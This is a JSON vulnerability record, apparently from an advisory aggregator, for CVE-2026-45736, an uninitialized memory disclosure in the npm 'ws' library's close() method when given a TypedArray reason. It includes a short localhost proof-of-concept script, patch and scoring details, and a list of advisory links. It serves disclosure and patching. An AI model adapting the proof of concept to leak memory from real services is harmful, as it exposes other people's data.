{"id":"CVE-2026-45736","aliases":["GHSA-58qx-3vcg-4xpx"],"url":"https://o3.security/vulnerability/CVE-2026-45736","summary":"ws: Uninitialized memory disclosure","details":"### Impact\n\nThe `websocket.close()` implementation is vulnerable to uninitialized memory disclosure when a `TypedArray` is passed as the reason argument.\n\n### Proof of concept\n\n```js\nimport { deepStrictEqual } from 'node:assert';\nimport { WebSocket, WebSocketServer } from 'ws';\n\nconst wss = new WebSocketServer(\n  { port: 0, skipUTF8Validation: true },\n  function () {\n    const { port } = wss.address();\n    const ws = new WebSocket(`ws://localhost:${port}`, {\n      skipUTF8Validation: true\n    });\n\n    ws.on('close', function (code, reason) {\n      deepStrictEqual(reason, Buffer.alloc(80));\n    });\n  }\n);\n\nwss.on('connection', function (ws) {\n  ws.close(1000, new Float32Array(20));\n});\n```\n\n### Patches\n\nThe vulnerability was fixed in ws@8.20.1 (https://github.com/websockets/ws/commit/c0327ec15a54d701eb6ccefaa8bef328cfc03086).\n\n### Credits\n\nCredit for the private and responsible disclosure of this issue goes to [Nikita Skovoroda](https://github.com/ChALkeR).\n\n### Remarks\n\nAlthough the calculated CVSS severity is medium, the actual severity is believed to be low, as the flaw is only exploitable through misuse that is unlikely in practice.\n\n### Resources\n\n- https://github.com/advisories/GHSA-58qx-3vcg-4xpx\n- https://www.cve.org/CVERecord?id=CVE-2026-45736","published":"2026-05-15T14:53:57.263Z","modified":"2026-09-15T17:11:41.282005428Z","cvss":{"score":4.4,"severity":"MEDIUM","vector":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N"},"epss":{"score":0.00745,"percentile":0.53111,"asOf":"2026-09-17"},"cisaKev":null,"exploitsKnown":0,"affectedPackages":[{"ecosystem":"npm","name":"ws","fixedVersion":"8.20.1"}],"fix":{"url":"https://github.com/websockets/ws/commit/c0327ec15a54d701eb6ccefaa8bef328cfc03086","label":"websockets/ws@c0327ec"},"references":[{"type":"WEB","url":"https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-45736.json"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:26638"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:26994"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:27171"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:29197"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:33574"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:34374"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:36754"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:36820"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:37272"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:40768"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:40792"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:41928"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:44235"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:44263"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:44267"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:48151"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:48693"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:56366"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:56431"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:56928"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:57013"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:57590"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:60520"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:65126"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:66488"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:66545"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2026:7655"},{"type":"ADVISORY","url":"https://access.redhat.com/security/cve/CVE-2026-45736"},{"type":"ADVISORY","url":"https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/45xxx/CVE-2026-45736.json"},{"type":"ADVISORY","url":"https://github.com/websockets/ws/security/advisories/GHSA-58qx-3vcg-4xpx"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-45736"},{"type":"REPORT","url":"https://bugzilla.redhat.com/show_bug.cgi?id=2477914"},{"type":"FIX","url":"https://github.com/websockets/ws/commit/c0327ec15a54d701eb6ccefaa8bef328cfc03086"},{"type":"PACKAGE","url":"https://github.com/websockets/ws"}],"provenance":{"sources":["OSV.dev","FIRST.org (EPSS)"],"lastVerified":"2026-09-15T17:11:41.282005428Z"}}